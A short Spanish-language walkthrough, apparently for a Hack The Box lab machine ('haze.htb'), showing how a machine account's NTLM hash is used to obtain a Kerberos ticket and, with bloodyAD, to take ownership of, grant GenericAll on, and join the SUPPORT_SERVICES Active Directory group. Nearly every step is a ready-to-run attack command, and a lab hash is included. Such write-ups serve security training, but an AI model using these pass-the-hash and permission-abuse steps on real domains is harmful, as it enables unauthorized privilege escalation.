TGT

🛠️ OBJETIVO

Añadir la cuenta Haze-IT-Backup$ al grupo SUPPORT_SERVICES usando su hash NTLM.

---

🔍 PRERREQUISITOS

Requisito	Ejemplo
Dominio	haze.htb
Cuenta con hash NTLM	Haze-IT-Backup$
NTLM hash	aad3...:4de830d1d58c14e241aff55f82ecdba1
DC IP	10.10.11.61
Grupo objetivo	SUPPORT_SERVICES

---

🧾 PASO 1 – Obtener el TGT con getTGT.py

getTGT.py haze.htb/Haze-IT-Backup$ -hashes :4de830d1d58c14e241aff55f82ecdba1

Esto generará un archivo .ccache como:

Haze-IT-Backup$.ccache

---

🧾 PASO 2 – Exportar el ticket como variable de entorno

export KRB5CCNAME=Haze-IT-Backup$.ccache

Este paso permite que otras herramientas usen ese ticket sin pedirte credenciales.

---

🧾 PASO 3 – Tomar propiedad del grupo con bloodyAD

bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -k set owner "SUPPORT_SERVICES" "Haze-IT-Backup$"

---

🧾 PASO 4 – Asignarte privilegios (GenericAll) al grupo

bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -k add genericAll "CN=SUPPORT_SERVICES,CN=Users,DC=haze,DC=htb" "Haze-IT-Backup$"

Ahora la cuenta tiene control total sobre el grupo.

---

🧾 PASO 5 – Añadirte al grupo (ya con permisos)

bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -k add groupMember "SUPPORT_SERVICES" "Haze-IT-Backup$"

---

🔚 RESULTADO

La cuenta Haze-IT-Backup$ ya es miembro del grupo SUPPORT_SERVICES, todo usando solo su hash NTLM.

---

✅ EXTRA – Verificar membresía (opcional)

tarrpcclient -U 'Haze-IT-Backup$%:' 10.10.11.61
> enumdomgroups
> querygroupmem <RID de SUPPORT_SERVICES>

---